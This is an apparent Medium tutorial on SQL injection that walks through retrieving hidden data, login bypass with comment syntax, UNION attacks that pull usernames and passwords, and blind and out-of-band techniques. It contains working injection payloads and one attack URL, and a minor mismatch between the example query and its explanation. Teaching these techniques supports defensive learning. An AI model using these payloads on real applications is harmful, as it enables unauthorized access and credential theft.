Why and How to do SQL Injection?

SELECT * FROM products WHERE category = 'Pens'

  • all details (*)
  • from the products table
  • where the category is Gifts
  • Retrieving hidden data, where you can modify an SQL query to return additional results.
  • Subverting application logic, where you can change a query to interfere with the application’s logic.
  • UNION attacks, where you can retrieve data from different database tables.
  • Examining the database, where you can extract information about the version and structure of the database.

1. Retrieving hidden data.

SELECT * FROM products WHERE category = ‘Pens’ AND released = 1

Comment syntax in MySQL



SELECT * FROM products WHERE category = ‘Pens’ OR 1=1 #’ AND released = 1

2. Subverting application logic.

SELECT * FROM users WHERE username = 'sumo' AND password = 'iamcybermight'

SELECT * FROM users WHERE username = 'administrator'--' AND password = ''

3. UNION attacks.

SELECT name, description FROM products WHERE category = 'Pens'

' UNION SELECT username, password FROM users--

https://www.iamcyberstore/category?id=Pens'+UNION+SELECT +username,+password+FROM+users--

  • The individual queries must return the same number of columns.
  • The data types in each column must be compatible between the individual queries.
  • How many columns from the original query returned?
  • Which columns returned from the original query are of a suitable data type to hold the results from the injected query?

4. Examining the database.

Default syntax to determine its type and version
Copyright: Port Swigger
  • You can change the logic of the query to trigger a detectable difference in the application’s response depending on the truth of a single condition. This might involve injecting a new condition into some Boolean logic or conditionally triggering an error such as a divide-by-zero.
  • You can conditionally trigger a time delay in the processing of the query, allowing you to infer the truth of the condition based on the time that the application takes to respond.
  • You can trigger an out-of-band network interaction, using OAST techniques. This technique is extremely powerful and works in situations where the other techniques do not. Often, you can directly exfiltrate data via the out-of-band channel, for example by placing the data into a DNS lookup for a domain that you control.
Do Follow us on Instagram [iamcybermight]




Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Become An Amazing Developer With Our Android Training

How integers are stored in memory using two’s complement

Setting up an RPC for the Harmony network

Crestron Masters Hackathon 2019

Sources of Complexity

Testing your PWA: Progressive Web Application

Develop on Kubernetes Series —Operator Dev — The Introduction

Who’s in Control?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Sumanth Dodda

Sumanth Dodda

More from Medium

VulnHub’s Mr. Robot: A Walkthrough

Previse Writeup — HackTheBox

Kioptrix Level 1 — Vulnhub VM Challenge


Promo cover for NPST CTF 2021 write up — by Author